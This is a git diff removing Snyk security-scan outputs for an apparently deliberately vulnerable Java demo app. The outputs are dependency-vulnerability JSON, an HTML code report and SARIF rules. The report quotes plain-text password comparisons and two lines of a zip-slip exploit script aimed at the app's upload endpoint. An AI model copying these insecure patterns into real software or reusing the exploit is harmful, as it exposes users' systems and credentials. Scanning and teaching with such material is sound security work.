[ - "[3.5.0.Beta-1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-entitymanager", - "creationTime": "2024-06-18T11:52:01.913Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:52:01.913Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-entitymanager@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-entitymanager", - "version": "4.3.7.Final", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[3.0.1.GA, 3.1.2.GA)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.jboss.logging:jboss-logging", - "creationTime": "2024-06-18T02:47:02.411Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:47:02.411Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final", - "org.jboss.logging:jboss-logging@3.1.0.CR2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.jboss.logging:jboss-logging", - "version": "3.1.0.CR2", - "severityWithCritical": "medium" - } - ], - "upgrade": { - "org.apache.logging.log4j:log4j-core@2.7": { - "upgradeTo": "org.apache.logging.log4j:log4j-core@2.13.2", - "upgrades": [ - "org.apache.logging.log4j:log4j-core@2.7", - "org.apache.logging.log4j:log4j-core@2.7", - "org.apache.logging.log4j:log4j-core@2.7", - "org.apache.logging.log4j:log4j-core@2.7", - "org.apache.logging.log4j:log4j-core@2.7", - "org.apache.logging.log4j:log4j-core@2.7" - ], - "vulns": [ - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-31409" - ] - }, - "org.apache.struts:struts2-core@2.3.20": { - "upgradeTo": "org.apache.struts:struts2-core@6.1.2", - "upgrades": [ - "commons-fileupload:commons-fileupload@1.3.1", - "commons-io:commons-io@2.2", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.freemarker:freemarker@2.3.19", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "commons-fileupload:commons-fileupload@1.3.1", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "commons-fileupload:commons-fileupload@1.3.1", - "commons-fileupload:commons-fileupload@1.3.1", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "ognl:ognl@3.0.6", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts:struts2-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20", - "org.apache.struts.xwork:xwork-core@2.3.20" - ], - "vulns": [ - "SNYK-JAVA-COMMONSFILEUPLOAD-3326457", - "SNYK-JAVA-COMMONSIO-1277109", - "SNYK-JAVA-ORGAPACHESTRUTS-6102825", - "SNYK-JAVA-ORGAPACHESTRUTS-6100744", - "SNYK-JAVA-ORGAPACHESTRUTS-5707101", - "SNYK-JAVA-ORGAPACHESTRUTS-2635340", - "SNYK-JAVA-ORGAPACHESTRUTS-1049003", - "SNYK-JAVA-ORGFREEMARKER-1076795", - "SNYK-JAVA-ORGAPACHESTRUTS-608097", - "SNYK-JAVA-ORGAPACHESTRUTS-608098", - "SNYK-JAVA-ORGAPACHESTRUTS-609765", - "SNYK-JAVA-COMMONSFILEUPLOAD-30401", - "SNYK-JAVA-ORGAPACHESTRUTS-32477", - "SNYK-JAVA-ORGAPACHESTRUTS-31495", - "SNYK-JAVA-ORGAPACHESTRUTS-31501", - "SNYK-JAVA-ORGAPACHESTRUTS-31502", - "SNYK-JAVA-ORGAPACHESTRUTS-31503", - "SNYK-JAVA-ORGAPACHESTRUTS-31500", - "SNYK-JAVA-ORGAPACHESTRUTS-30207", - "SNYK-JAVA-ORGAPACHESTRUTS-30778", - "SNYK-JAVA-COMMONSFILEUPLOAD-30082", - "SNYK-JAVA-COMMONSFILEUPLOAD-31540", - "SNYK-JAVA-ORGAPACHESTRUTS-30774", - "SNYK-JAVA-ORGAPACHESTRUTS-30775", - "SNYK-JAVA-ORGAPACHESTRUTS-30776", - "SNYK-JAVA-ORGAPACHESTRUTS-451610", - "SNYK-JAVA-ORGAPACHESTRUTS-460223", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804", - "SNYK-JAVA-OGNL-30474", - "SNYK-JAVA-ORGAPACHESTRUTS-30773", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801", - "SNYK-JAVA-ORGAPACHESTRUTS-30060", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864", - "SNYK-JAVA-ORGAPACHESTRUTS-30770", - "SNYK-JAVA-ORGAPACHESTRUTS-30771", - "SNYK-JAVA-ORGAPACHESTRUTS-30772", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611", - "SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418" - ] - }, - "org.springframework:spring-web@3.2.6.RELEASE": { - "upgradeTo": "org.springframework:spring-web@5.3.34", - "upgrades": [ - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-web@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE", - "org.springframework:spring-web@3.2.6.RELEASE" - ], - "vulns": [ - "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-30165", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-30164", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-30163", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-31331" - ] - }, - "org.zeroturnaround:zt-zip@1.12": { - "upgradeTo": "org.zeroturnaround:zt-zip@1.13", - "upgrades": [ - "org.zeroturnaround:zt-zip@1.12" - ], - "vulns": [ - "SNYK-JAVA-ORGZEROTURNAROUND-31681" - ] - } - }, - "patch": {}, - "ignore": {}, - "pin": {} - }, - "filesystemPolicy": false, - "filtered": { - "ignore": [], - "patch": [] - }, - "uniqueCount": 157, - "projectName": "io.github.snyk:todolist-web-struts", - "foundProjectCount": 7, - "displayTargetFile": "todolist-goof/todolist-web-struts/pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" - } -] diff --git a/output.txt b/output.txt deleted file mode 100644 index 41bda4bec4..0000000000 --- a/output.txt +++ /dev/null @@ -1,15 +0,0 @@ - -Testing /Users/austindoll/Documents/GitHub/java-goof ... - - -✔ Test completed - -Organization: austin.doll -Test type: Static code analysis -Project path: /Users/austindoll/Documents/GitHub/java-goof - -Summary: - -✔ Awesome! No issues were found. - - diff --git a/output2.json b/output2.json deleted file mode 100644 index f64d7e0220..0000000000 --- a/output2.json +++ /dev/null @@ -1,12 +0,0 @@ -[ - "CWE-918" -] -[ - "CWE-256" -] -[ - "CWE-918" -] -[ - "CWE-256" -] diff --git a/snyk.html b/snyk.html deleted file mode 100644 index c82edb3770..0000000000 --- a/snyk.html +++ /dev/null @@ -1,828 +0,0 @@ - - - - - - - - - Snyk test report - - - - - - - - - -
-
-
- - - Snyk - Snyk Code - - - - - - - - - - - - - - - -
-

February 26th 2024, 2:54:11 pm (UTC+00:00)

-
Source: /Users/austindoll/Documents/GitHub/java-goof
-
-
-
- -
-
-
-

Snyk Code Report

- -
-
- 0 high issues -
-
- 3 medium issues -
-
- 0 low issues -
-
-
-
- Scan Coverage -
    -
  • HTML files: 10
  • Python files: 2
  • JavaScript files: 6
  • Java Server Pages files: 12
  • Java files: 36
  • XML files: 14
    • -
-
-
-
-
-
-
-
-

Unprotected Storage of Credentials

-
- Data Flow - Fix Analysis -
-
-
    -
  • SNYK-CODE
    • -
  • CWE-256
    • -
-
-
-
-

An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.

-
Found in: todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java (line : 250)
-
-
-

Data Flow

-
todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java
-
- 250:17 -
return !
changePasswordForm.getNewPassword().equals(changePasswordForm.getConfirmationPassword());
- SourceSink - 0 -
-
-
-

Fix Analysis

-

Details

-

If credentials are not protected or not sufficiently protected through strong encryption, attackers can access this information in a number of ways. Developers may rely on plain-text storage of credentials when they believe the system is completely secure from attack or only accessible to insiders. This confidence is misguided and dangerous. If a malicious insider-such as a former employee-or a hostile attacker using SQL injection, XML injection, or a brute-force attack accesses the system, they can access this credential information to gain unauthorized permissions within the system and to export other confidential and secure information.

-

Best practices for prevention

-
    -
  • Ensure that passwords are never stored in plain text, even for "purely internal" use.
    • -
  • Never rely on password encoding, such as base 64 encoding; choose a complex encryption algorithm that includes salting, then hashing.
    • -
  • Implement zero-trust approaches in which users have access only to information needed for legitimate business purposes.
    • -
  • To the greatest extent possible, secure the application against injection attacks and other types of weaknesses.
    • -
-
-
-
-
-
-
-
-
-

Unprotected Storage of Credentials

-
- Data Flow - Fix Analysis -
-
-
    -
  • SNYK-CODE
    • -
  • CWE-256
    • -
-
-
-
-

An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.

-
Found in: todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java (line : 254)
-
-
-

Data Flow

- -
- 254:17 -
return !
changePasswordForm.getCurrentPassword().equals(user.getPassword());
- SourceSink - 0 -
-
-
-

Fix Analysis

-

Details

-

If credentials are not protected or not sufficiently protected through strong encryption, attackers can access this information in a number of ways. Developers may rely on plain-text storage of credentials when they believe the system is completely secure from attack or only accessible to insiders. This confidence is misguided and dangerous. If a malicious insider-such as a former employee-or a hostile attacker using SQL injection, XML injection, or a brute-force attack accesses the system, they can access this credential information to gain unauthorized permissions within the system and to export other confidential and secure information.

-

Best practices for prevention

-
    -
  • Ensure that passwords are never stored in plain text, even for "purely internal" use.
    • -
  • Never rely on password encoding, such as base 64 encoding; choose a complex encryption algorithm that includes salting, then hashing.
    • -
  • Implement zero-trust approaches in which users have access only to information needed for legitimate business purposes.
    • -
  • To the greatest extent possible, secure the application against injection attacks and other types of weaknesses.
    • -
-
-
-
-
-
-
-
-
-

Server-Side Request Forgery (SSRF)

-
- Data Flow - Fix Analysis -
-
-
    -
  • SNYK-CODE
    • -
  • CWE-918
    • -
-
-
-
-

Unsanitized input from a command line argument flows into requests.post, where it is used as an URL to perform a request. This may result in a Server Side Request Forgery vulnerability.

-
Found in: todolist-goof/exploits/zip-slip.py (line : 13)
-
-
-

Data Flow

-
todolist-goof/exploits/zip-slip.py
-
- 10:8 -
url = (
sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
- Source - 0 -
- -
- 10:8 -
url = (
sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
- - 1 -
- -
- 10:8 -
url = (
sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
- - 2 -
- -
- 10:8 -
url = (
sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
- - 3 -
- -
- 10:7 -
url =
(sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
- - 4 -
- -
- 10:1 -

url = (sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:8080') + '/todo/upload.do.action'
- - 5 -
- -
- 13:15 -
requests.post(
url, files=files)
- - 6 -
- -
- 13:1 -

requests.post(url, files=files)
- Sink - 7 -
-
-
-

Fix Analysis

-

Details

-

In a server-side request forgery attack, a malicious user supplies a URL (an external URL or a network IP address such as 127.0.0.1) to the application's back end. The server then accesses the URL and shares its results, which may include sensitive information such as AWS metadata, internal configuration information, or database contents with the attacker. Because the request comes from the back end, it bypasses access controls, potentially exposing information the user does not have sufficient privileges to receive. The attacker can then exploit this information to gain access, modify the web application, or demand a ransom payment.

-

Best practices for prevention

-
    -
  • Blacklists are problematic and attackers have numerous ways to bypass them; ideally, use a whitelist of all permitted domains and IP addresses.
    • -
  • Use authentication even within your own network to prevent exploitation of server-side requests.
    • -
  • Implement zero trust and sanitize and validate all URL and header data returning to the server from the user. Strip invalid or suspect characters, then inspect to be certain it contains a valid and expected value.
    • -
  • Ideally, avoid sending server requests based on user-provided data altogether.
    • -
  • Ensure that you are not sending raw response bodies from the server directly to the client. Only deliver expected responses.
    • -
  • Disable suspect and exploitable URL schemas. Common culprits include obscure and little-used schemas such as file://, dict://, ftp://, and gopher://.
    • -
-
-
-
-
-
-
-
- - - \ No newline at end of file diff --git a/test-command.json b/test-command.json deleted file mode 100644 index 6d4c11ff6e..0000000000 --- a/test-command.json +++ /dev/null @@ -1,1421 +0,0 @@ -{ - "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", - "version": "2.1.0", - "runs": [ - { - "tool": { - "driver": { - "name": "SnykCode", - "semanticVersion": "1.0.0", - "version": "1.0.0", - "rules": [ - { - "id": "python/Ssrf", - "name": "Ssrf", - "shortDescription": { - "text": "Server-Side Request Forgery (SSRF)" - }, - "defaultConfiguration": { - "level": "warning" - }, - "help": { - "markdown": "\n## Details\nIn a server-side request forgery attack, a malicious user supplies a URL (an external URL or a network IP address such as 127.0.0.1) to the application's back end. The server then accesses the URL and shares its results, which may include sensitive information such as AWS metadata, internal configuration information, or database contents with the attacker. Because the request comes from the back end, it bypasses access controls, potentially exposing information the user does not have sufficient privileges to receive. The attacker can then exploit this information to gain access, modify the web application, or demand a ransom payment.\n\n## Best practices for prevention\n* Blacklists are problematic and attackers have numerous ways to bypass them; ideally, use a whitelist of all permitted domains and IP addresses.\n* Use authentication even within your own network to prevent exploitation of server-side requests.\n* Implement zero trust and sanitize and validate all URL and header data returning to the server from the user. Strip invalid or suspect characters, then inspect to be certain it contains a valid and expected value.\n* Ideally, avoid sending server requests based on user-provided data altogether.\n* Ensure that you are not sending raw response bodies from the server directly to the client. Only deliver expected responses.\n* Disable suspect and exploitable URL schemas. Common culprits include obscure and little-used schemas such as `file://`, `dict://`, `ftp://`, and `gopher://`.", - "text": "" - }, - "properties": { - "tags": [ - "python", - "Ssrf", - "Security", - "SourceNonServer", - "SourceLocalEnv", - "SourceCLI", - "Taint" - ], - "categories": [ - "Security" - ], - "exampleCommitFixes": [ - { - "commitURL": "https://github.com/ARM-software/vulkan_best_practice_for_mobile_developers/commit/23ad832af741f0354949a72e6c6f799eb9d2bace?diff=split#diff-7efee2ee97af01f846ed5818e84c955c51bd8efe06588e0dfa341c68966d945fL-1", - "lines": [ - { - "line": " parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=\"Downloads and unpacks assets\")\n", - "lineNumber": 31, - "lineChange": "removed" - }, - { - "line": " parser.add_argument(\"zip_url\", action=\"store\", type=str, help=\"URL of the assets package\")\n", - "lineNumber": 32, - "lineChange": "removed" - }, - { - "line": " args = parser.parse_args()\n", - "lineNumber": 33, - "lineChange": "removed" - }, - { - "line": " url = \"https://github.com/ARM-software/vulkan_best_practice_for_mobile_developers/releases/download/v1.1.2/scenes.zip\"\n", - "lineNumber": 31, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 34, - "lineChange": "none" - }, - { - "line": " try:\n", - "lineNumber": 35, - "lineChange": "none" - }, - { - "line": " request = requests.get(args.zip_url, stream=True)\n", - "lineNumber": 36, - "lineChange": "removed" - }, - { - "line": " request = requests.get(url, stream=True)\n", - "lineNumber": 34, - "lineChange": "added" - } - ] - }, - { - "commitURL": "https://github.com/yask123/Instant-Movie-Streamer/commit/0b66df24286da3df144b8874cb40db4c6ddf5c6c?diff=split#diff-92c6c2b7103c0f894cf5a1c09b289b8251c1c260eb20cb9027189a2a0eee5d99L-1", - "lines": [ - { - "line": "def get_magnet_link(movie_name = 'harry potter'):\n", - "lineNumber": 32, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 33, - "lineChange": "added" - }, - { - "line": " URL = 'https://www.skytorrents.in/search/all/ed/1/?q='+movie_name.replace(' ', '+')\n", - "lineNumber": 34, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 39, - "lineChange": "none" - }, - { - "line": "def get_torrent_url(search_url):\n", - "lineNumber": 40, - "lineChange": "removed" - }, - { - "line": " \"\"\"Grabs the best matched torrent URL from the search results.\"\"\"\n", - "lineNumber": 41, - "lineChange": "removed" - }, - { - "line": " search_request_response = requests.get(search_url, verify=False)\n", - "lineNumber": 42, - "lineChange": "removed" - }, - { - "line": " soup = BeautifulSoup(search_request_response.text, 'html.parser')\n", - "lineNumber": 43, - "lineChange": "removed" - }, - { - "line": " movie_page = 'https://kat.cr' + (soup.find_all(\"a\", class_=\"cellMainLink\")[0].get('href'))\n", - "lineNumber": 44, - "lineChange": "removed" - }, - { - "line": " resp = requests.get(URL)\n", - "lineNumber": 36, - "lineChange": "added" - }, - { - "line": " soup = BeautifulSoup(resp.text, 'html.parser')\n", - "lineNumber": 37, - "lineChange": "added" - } - ] - }, - { - "commitURL": "https://github.com/hacktoolkit/django-htk/commit/01df728743a36721d7659247a3e3b9907133ffee?diff=split#diff-eec36e337287f60f4a26ec5ed80b77d0234217d0de7dab8846fe3a39048cef9fL-1", - "lines": [ - { - "line": "GOOGLE_GEOCODING_API_BASE_URL = 'https://maps.googleapis.com/maps/api/geocode/%(format)s?sensor=%(sensor)s&'\n", - "lineNumber": 23, - "lineChange": "removed" - }, - { - "line": "GOOGLE_GEOCODING_API_GEOCODE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'address=%(address)s'\n", - "lineNumber": 24, - "lineChange": "removed" - }, - { - "line": "GOOGLE_GEOCODING_API_REVERSE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'latlng=%(latlng)s'\n", - "lineNumber": 25, - "lineChange": "removed" - }, - { - "line": "from htk.utils import htk_setting\n", - "lineNumber": 23, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 24, - "lineChange": "added" - }, - { - "line": "GOOGLE_GEOCODING_API_URL = 'https://maps.googleapis.com/maps/api/geocode/json'\n", - "lineNumber": 25, - "lineChange": "added" - }, - { - "line": "#GOOGLE_GEOCODING_API_BASE_URL = 'https://maps.googleapis.com/maps/api/geocode/%(format)s?sensor=%(sensor)s&'\n", - "lineNumber": 26, - "lineChange": "added" - }, - { - "line": "#GOOGLE_GEOCODING_API_GEOCODE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'address=%(address)s'\n", - "lineNumber": 27, - "lineChange": "added" - }, - { - "line": "#GOOGLE_GEOCODING_API_REVERSE_URL = GOOGLE_GEOCODING_API_BASE_URL + 'latlng=%(latlng)s'\n", - "lineNumber": 28, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 29, - "lineChange": "none" - }, - { - "line": "class Usage(Exception):\n", - "lineNumber": 30, - "lineChange": "none" - }, - { - "line": " def __init__(self, msg):\n", - "lineNumber": 31, - "lineChange": "none" - }, - { - "line": " self.msg = msg\n", - "lineNumber": 32, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 33, - "lineChange": "none" - }, - { - "line": "def main(argv = None):\n", - "lineNumber": 34, - "lineChange": "none" - }, - { - "line": " OPT_STR = 'hgr'\n", - "lineNumber": 35, - "lineChange": "none" - }, - { - "line": " OPT_LIST = [\n", - "lineNumber": 36, - "lineChange": "none" - }, - { - "line": " 'help',\n", - "lineNumber": 37, - "lineChange": "none" - }, - { - "line": " 'geocode',\n", - "lineNumber": 38, - "lineChange": "none" - }, - { - "line": " 'resolve',\n", - "lineNumber": 39, - "lineChange": "none" - }, - { - "line": " ]\n", - "lineNumber": 40, - "lineChange": "none" - }, - { - "line": " is_geocode = True\n", - "lineNumber": 41, - "lineChange": "none" - }, - { - "line": " if argv is None:\n", - "lineNumber": 42, - "lineChange": "none" - }, - { - "line": " argv = sys.argv\n", - "lineNumber": 43, - "lineChange": "none" - }, - { - "line": " try:\n", - "lineNumber": 44, - "lineChange": "none" - }, - { - "line": " try:\n", - "lineNumber": 45, - "lineChange": "none" - }, - { - "line": " progname = argv[0]\n", - "lineNumber": 46, - "lineChange": "none" - }, - { - "line": " opts, args = getopt.getopt(argv[1:],\n", - "lineNumber": 47, - "lineChange": "none" - }, - { - "line": " OPT_STR,\n", - "lineNumber": 48, - "lineChange": "none" - }, - { - "line": " OPT_LIST)\n", - "lineNumber": 49, - "lineChange": "none" - }, - { - "line": " except getopt.error, msg:\n", - "lineNumber": 50, - "lineChange": "none" - }, - { - "line": " raise Usage(msg)\n", - "lineNumber": 51, - "lineChange": "none" - }, - { - "line": " # process options\n", - "lineNumber": 52, - "lineChange": "none" - }, - { - "line": " for o, a in opts:\n", - "lineNumber": 53, - "lineChange": "none" - }, - { - "line": " if o in ('-h', '--help'):\n", - "lineNumber": 54, - "lineChange": "none" - }, - { - "line": " print __doc__\n", - "lineNumber": 55, - "lineChange": "none" - }, - { - "line": " sys.exit(0)\n", - "lineNumber": 56, - "lineChange": "none" - }, - { - "line": " elif o in ('-g', '--geocode'):\n", - "lineNumber": 57, - "lineChange": "none" - }, - { - "line": " is_geocode = True\n", - "lineNumber": 58, - "lineChange": "none" - }, - { - "line": " elif o in ('-r', '--resolve'):\n", - "lineNumber": 59, - "lineChange": "none" - }, - { - "line": " is_geocode = False\n", - "lineNumber": 60, - "lineChange": "none" - }, - { - "line": " if is_geocode and len(args) == 1:\n", - "lineNumber": 61, - "lineChange": "none" - }, - { - "line": " address = args[0]\n", - "lineNumber": 62, - "lineChange": "none" - }, - { - "line": " latitude, longitude = get_latlng(address)\n", - "lineNumber": 63, - "lineChange": "none" - }, - { - "line": " print '%s,%s' % (latitude, longitude,)\n", - "lineNumber": 64, - "lineChange": "none" - }, - { - "line": " elif not is_geocode and len(args) == 2:\n", - "lineNumber": 65, - "lineChange": "none" - }, - { - "line": " latitude = args[0]\n", - "lineNumber": 66, - "lineChange": "none" - }, - { - "line": " longitude = args[1]\n", - "lineNumber": 67, - "lineChange": "none" - }, - { - "line": " address = reverse_geocode(latitude, longitude)\n", - "lineNumber": 68, - "lineChange": "none" - }, - { - "line": " print address\n", - "lineNumber": 69, - "lineChange": "none" - }, - { - "line": " else:\n", - "lineNumber": 70, - "lineChange": "none" - }, - { - "line": " raise Usage('Incorrect arguments')\n", - "lineNumber": 71, - "lineChange": "none" - }, - { - "line": " \n", - "lineNumber": 72, - "lineChange": "none" - }, - { - "line": " except Usage, err:\n", - "lineNumber": 73, - "lineChange": "none" - }, - { - "line": " print >> sys.stderr, err.msg\n", - "lineNumber": 74, - "lineChange": "none" - }, - { - "line": " print >> sys.stderr, \"for help use --help\"\n", - "lineNumber": 75, - "lineChange": "none" - }, - { - "line": " return 3.14159\n", - "lineNumber": 76, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 77, - "lineChange": "none" - }, - { - "line": "def get_latlng(address):\n", - "lineNumber": 78, - "lineChange": "none" - }, - { - "line": " address_query = urllib.quote(address, '')\n", - "lineNumber": 76, - "lineChange": "none" - }, - { - "line": " \n", - "lineNumber": 77, - "lineChange": "none" - }, - { - "line": " values = {\n", - "lineNumber": 78, - "lineChange": "none" - }, - { - "line": " 'format' : 'json',\n", - "lineNumber": 79, - "lineChange": "none" - }, - { - "line": "'sensor' : 'false',\n", - "lineNumber": 80, - "lineChange": "none" - }, - { - "line": "'address' : address_query,\n", - "lineNumber": 81, - "lineChange": "none" - }, - { - "line": " }\n", - "lineNumber": 82, - "lineChange": "none" - }, - { - "line": " url = GOOGLE_GEOCODING_API_GEOCODE_URL % values\n", - "lineNumber": 83, - "lineChange": "removed" - }, - { - "line": " response = requests.get(url)\n", - "lineNumber": 84, - "lineChange": "removed" - }, - { - "line": " key = htk_setting('HTK_GOOGLE_GEOCODING_API_KEY', None)\n", - "lineNumber": 83, - "lineChange": "added" - }, - { - "line": " if key:\n", - "lineNumber": 84, - "lineChange": "added" - }, - { - "line": " params['key'] = key\n", - "lineNumber": 85, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 86, - "lineChange": "added" - }, - { - "line": " response = requests.get(GOOGLE_GEOCODING_API_URL, params=params)\n", - "lineNumber": 87, - "lineChange": "added" - } - ] - } - ], - "exampleCommitDescriptions": [], - "precision": "very-high", - "repoDatasetSize": 4, - "cwe": [ - "CWE-918" - ] - } - }, - { - "id": "java/ReturnsPassword", - "name": "ReturnsPassword", - "shortDescription": { - "text": "Unprotected Storage of Credentials" - }, - "defaultConfiguration": { - "level": "warning" - }, - "help": { - "markdown": "## Details\n\nIf credentials are not protected or not sufficiently protected through strong encryption, attackers can access this information in a number of ways. Developers may rely on plain-text storage of credentials when they believe the system is completely secure from attack or only accessible to insiders. This confidence is misguided and dangerous. If a malicious insider-such as a former employee-or a hostile attacker using SQL injection, XML injection, or a brute-force attack accesses the system, they can access this credential information to gain unauthorized permissions within the system and to export other confidential and secure information.\n\n## Best practices for prevention\n* Ensure that passwords are never stored in plain text, even for \"purely internal\" use.\n* Never rely on password encoding, such as base 64 encoding; choose a complex encryption algorithm that includes salting, then hashing.\n* Implement zero-trust approaches in which users have access only to information needed for legitimate business purposes.\n* To the greatest extent possible, secure the application against injection attacks and other types of weaknesses.", - "text": "" - }, - "properties": { - "tags": [ - "java", - "ReturnsPassword", - "Security" - ], - "categories": [ - "Security" - ], - "exampleCommitFixes": [ - { - "commitURL": "https://github.com/ShotaOd/carbon/commit/4562a7a2c0f27065ed63c7615f044423ad1701fd?diff=split#diff-5a57acf4efafddf23331cc9f3c8d724e1cdd01633f61aa2d4e680b9b5241ff71L-1", - "lines": [ - { - "line": "import org.mindrot.jbcrypt.BCrypt;\n", - "lineNumber": 6, - "lineChange": "added" - }, - { - "line": "\n", - "lineNumber": 7, 